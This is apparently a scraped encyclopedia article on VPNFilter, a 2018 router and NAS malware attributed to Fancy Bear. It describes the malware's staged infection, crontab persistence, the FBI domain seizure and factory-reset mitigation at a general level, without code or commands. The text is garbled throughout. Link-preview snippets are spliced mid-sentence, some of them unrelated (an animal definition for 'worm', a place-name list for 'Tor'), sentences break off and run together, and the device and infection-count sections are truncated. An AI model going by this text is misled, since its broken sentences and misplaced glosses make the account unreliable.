VPNFilter is
malware
Malware (a portmanteau for ''malicious software'') is any software intentionally designed to cause disruption to a computer, server, client, or computer network, leak private information, gain unauthorized access to information or systems, depri ...
designed to infect
routers and certain network attached storage devices. As of 24 May 2018, it is estimated to have infected approximately 500,000 routers worldwide, though the number of at-risk devices is larger.
It can steal data, contains a "kill switch" designed to disable the infected router on command, and is able to persist should the user reboot the router.
The
FBI
The Federal Bureau of Investigation (FBI) is the domestic Intelligence agency, intelligence and Security agency, security service of the United States and its principal Federal law enforcement in the United States, federal law enforcement age ...
believes that it was created by the Russian
Fancy Bear
Fancy Bear (also known as APT28 (by Mandiant), Pawn Storm, Sofacy Group (by Kaspersky), Sednit, Tsar Team (by FireEye) and STRONTIUM (by Microsoft)) is a Russian cyber espionage group. Cybersecurity firm CrowdStrike has said with a medium level ...
group.
Cyclops Blink
Cyclops Blink is malware that targets routers and firewall devices from WatchGuard and ASUS and adds them to a botnet for command and control (C&C).
Infection is through an exploit with the code CVE-2022-23176, which allows a privilege escalati ...
produced by Sandworm had replaced VPNFilter.
Operation
VPNFilter is malware infecting a number of different kinds of network routers and storage devices. It seems to be designed in part to target serial networking devices using the Modbus
Modbus is a data communications protocol originally published by Modicon (now Schneider Electric) in 1979 for use with its programmable logic controllers (PLCs). Modbus has become a ''de facto'' standard communication protocol and is now a commonl ...
protocol to talk to and control industrial hardware, as in factories and warehouses. The malware has special, dedicated code to target control systems
A control system manages, commands, directs, or regulates the behavior of other devices or systems using control loops. It can range from a single home heating controller using a thermostat controlling a domestic boiler to large industrial c ...
using SCADA
Supervisory control and data acquisition (SCADA) is a control system architecture comprising computers, networked data communications and graphical user interfaces for high-level supervision of machines and processes. It also covers sensors and ...
.[VPNFilter: New Router Malware with Destructive Capabilities](_blank)
/ref>
The initial infection vector is still unknown. The Cisco Talos security group hypothesizes the malware exploits known router security vulnerabilities to infect devices.worm
Worms are many different distantly related bilateral animals that typically have a long cylindrical tube-like body, no limbs, and no eyes (though not always).
Worms vary in size from microscopic to over in length for marine polychaete wor ...
which adds code to the device's crontab (the list of tasks run at regular intervals by the cron
The cron command-line utility is a job scheduler on Unix-like operating systems. Users who set up and maintain software environments use cron to schedule jobs (commands or shell scripts), also known as cron jobs, to run periodically at fixed ti ...
scheduler on Linux). This allows it to remain on the device after a reboot, and to re-infect it with the subsequent stages if they are removed. Stage 1 uses known URLs to find and install Stage 2 malware. If those known URLs are disabled, Stage 1 sets up a socket listener on the device and waits to be contacted by command and control systems.Tor
Tor, TOR or ToR may refer to:
Places
* Tor, Pallars, a village in Spain
* Tor, former name of Sloviansk, Ukraine, a city
* Mount Tor, Tasmania, Australia, an extinct volcano
* Tor Bay, Devon, England
* Tor River, Western New Guinea, Indonesia
Sc ...
network.
Mitigation
Both Cisco
Cisco Systems, Inc., commonly known as Cisco, is an American-based multinational digital communications technology conglomerate corporation headquartered in San Jose, California. Cisco develops, manufactures, and sells networking hardware, ...
and Symantec Symantec may refer to:
*An American consumer software company now known as Gen Digital Inc.
*A brand of enterprise security software purchased by Broadcom Inc.
Broadcom Inc. is an American designer, developer, manufacturer and global supplier ...
suggest that people who own affected devices do a factory reset
A factory reset, also known as hard reset or master reset, is a software restore of an electronic device to its original system state by erasing all of the information stored on the device. A keyboard input button factory reset is used to restore ...
. That is typically accomplished by using a small, pointed object, such as a straightened out paperclip, to push the small reset button on the back on the unit for 10 to 30 seconds (time varies by model). This will remove the malware, but also restores the router to all original settings. If the router has remote management enabled, a factory reset will often disable this (the default setting of many routers). Remote management is thought to be one possible vector for the initial attack.
Before connecting the factory-reset router to the internet again, the device's default passwords should be changed to prevent reinfection.
Devices at risk
The initial worm that installs VPNFilter can only attack devices running embedded firmware based on Busybox
BusyBox is a software suite that provides several Unix utilities in a single executable file. It runs in a variety of POSIX environments such as Linux, Android, and FreeBSD, although many of the tools it provides are designed to work with in ...
on Linux
Linux ( or ) is a family of open-source Unix-like operating systems based on the Linux kernel, an operating system kernel first released on September 17, 1991, by Linus Torvalds. Linux is typically packaged as a Linux distribution, which ...
compiled only for specific processors. This does not include non-embedded Linux devices such as workstations and servers.[Malware targeting Upvel as a vendor has been discovered, but we are unable to determine which specific device it is targeting.]
; ZTE
: ZXHN H108N
Epidemiology
VPNFilter is described by Cisco Talos as having infected as many as 500,000 devices worldwide,Ukraine
Ukraine ( uk, Україна, Ukraïna, ) is a country in Eastern Europe. It is the second-largest European country after Russia, which it borders to the east and northeast. Ukraine covers approximately . Prior to the ongoing Russian inv ...
.
FBI investigation
The FBI has taken a high-profile role in addressing this malware, conducting an investigation that resulted in the seizure of the domain name toknowall.com as ostensibly having been used to redirect queries from stage 1 of the malware, allowing it to locate and install copies of stages 2 and 3.[FBI to all router users: Reboot now to neuter Russia's VPNFilter malware](_blank)
/ref> The US Justice Department also compelled the site Photobucket to disable known URLs used to distribute malware Stage 2.
FBI recommendation on removing the infection
On 25 May 2018, the FBI recommended that users reboot
In computing, rebooting is the process by which a running computer system is restarted, either intentionally or unintentionally. Reboots can be either a cold reboot (alternatively known as a hard reboot) in which the power to the system is physi ...
their at-risk devices.
Notes
References
See also
* Cyclops Blink
Cyclops Blink is malware that targets routers and firewall devices from WatchGuard and ASUS and adds them to a botnet for command and control (C&C).
Infection is through an exploit with the code CVE-2022-23176, which allows a privilege escalati ...
{{Hacking in the 2010s
Exploit-based worms
2018 in technology